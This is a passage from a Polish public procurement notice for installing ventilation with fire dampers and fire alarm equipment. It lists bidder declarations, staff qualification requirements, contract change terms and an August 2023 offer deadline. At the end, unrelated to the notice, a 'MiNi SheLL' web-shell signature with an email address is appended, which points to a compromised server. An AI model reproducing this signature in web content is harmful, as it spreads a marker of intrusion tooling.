oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 do SWZ;<br/>1.1. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>1.2. Po wyborze oferty wybrany Wykonawca składa oświadczenie potwierdzające w zakresie aktualizacji o braku podstaw do wykluczenia – załącznik nr 10 do SWZ.<br/>2.	Jeżeli dotyczy Wykonawca, który polega na zasobach podmiotów udostępniających zasoby, o których mowa w art. 118 ust.1 uPzp składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – szczegóły rozdz. VIII SWZ.<br/>3.	Jeżeli dotyczy W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji, których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/>4.	Zamawiający wzywa Wykonawcę, którego Oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>5.	PODMIOTOWE ŚRODKI DOWODOWE wymagane od Wykonawcy obejmują:<br/>5.1. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r.<br/>poz. 275), z innym wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej -załącznik nr 3 do SWZ.<br/>5.2. wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami oraz oświadczenie na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej Wykonawcy- załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>2.4.1	należycie zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert co najmniej jedną robotę budowlaną polegającą na<br/> –załącznik nr 5:<br/>	realizacji 1 układu wentylacyjnego z minimalną ilością klap p.poż - 2 szt.<br/>lub <br/>	realizacji 2 zadań polegających na montażu układu wentylacyjnego z jedną klapą ppoż. <br/><br/><br/> *Dla ww. wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wysłania ogłoszenia do niniejszego postępowania (tj. z dnia wysłania ogłoszenia o zamówieniu do BZP)<br/><br/><br/> 2.4.2. dysponuje osobami skierowanymi do realizacji zamówienia, tj.: osobami posiadającymi kwalifikacje Zgodnie z PKN-CEN/TS 54-14:2006 – Systemy sygnalizacji pożarowej — Część 14: Wytyczne planowania, projektowania, instalowania, odbioru, eksploatacji i konserwacji. Jako postanowienia ogólne Pkt. 4.8 brzmi „Osoby fizyczne lub prawne wykonujące jakiekolwiek prace, będące przedmiotem niniejszych wytycznych, powinny mieć odpowiednie kompetencje, doświadczenie i kwalifikacje”. A dalej szczegółowo w pkt. 7.7 (dot. etapu montażu), pkt. 8.6 (dot. uruchamiania instalacji) wskazano, iż powinny zajmować się, tym osoby posiadające odpowiednią wiedzę teoretyczną, praktyczną i odpowiednie kwalifikacje- osoba wyznaczona z imienia i nazwiska odpowiedzialna za sprawy techniczne wynikające z podłączenia urządzeń SSP- wymagane doświadczenie w zakresie wiedzy praktycznej i teoretycznej.<br/>2.4.3	dysponuje osobami skierowanymi do realizacji zamówienia, tj. osobami posiadającymi kwalifikacje w zakresie obsługi, konserwacji, remontów, montażu i kontrolno – pomiarowym, w rozumieniu z art. 54 ust. 6 ustawy z dnia 10 kwietnia 1997 r Prawo Energetyczne, którego aktem wykonawczym jest rozporządzenie ministra gospodarki, pracy i polityki społecznej z dnia 28 kwietnia 2003 r w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacje przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci, a w szczególności osobami posiadającymi uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie co najmniej SEP E1 dla instalacji do 1 kV. – dołączona do dokumentacji kserokopia uprawnień, <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do Oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII pkt 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany niniejszej umowy mogą być dokonywane w granicach określonych w art. 455 uPzp, w formie pisemnej pod rygorem nieważności.<br/>2. Zmiany umowy możliwe są pod warunkiem wystąpienia następujących okoliczności i w niżej wskazanym zakresie:<br/>a) zmiana osoby Wykonawcy <br/>b) zmiana osób, danych kontaktowych lub adresów Stron wskazanych w niniejszej umowie, <br/>z zastrzeżeniem § 14 ust 7 niniejszej umowy.<br/>c) zmian przepisów prawa mających wpływ na termin wykonania robót lub sposób prowadzenia robót,<br/>d) powstania konieczności dostosowania zapisów umowy do zmian w obowiązującej legislacji,<br/>e) zmiana danych teleadresowych lub zmiana nazwy Stron niniejszej umowy,<br/>f) zmiana wysokości wynagrodzenia Wykonawcy oraz terminu realizacji zamówienia i zakresu<br/>g) zmiana terminu realizacji robót budowlanych i/lub przedmiotu umowy w szczególności w przypadku:<br/>-wystąpienia istotnych, z punktu widzenia terminu realizacji umowy (co Wykonawca wykaże), błędów projektowych,<br/>-wykrycia instalacji, urządzeń lub budowli podziemnych nie ujętych w dokumentacji <br/>h) Zmiana warunków płatności, ze względu na okoliczności nie leżące po stronie Wykonawcy, co Wykonawca wykaże.<br/>pozostałe par. 13 załącznik nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-02 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> zakończono

Creat By MiNi SheLL
Email: jattceo@gmail.com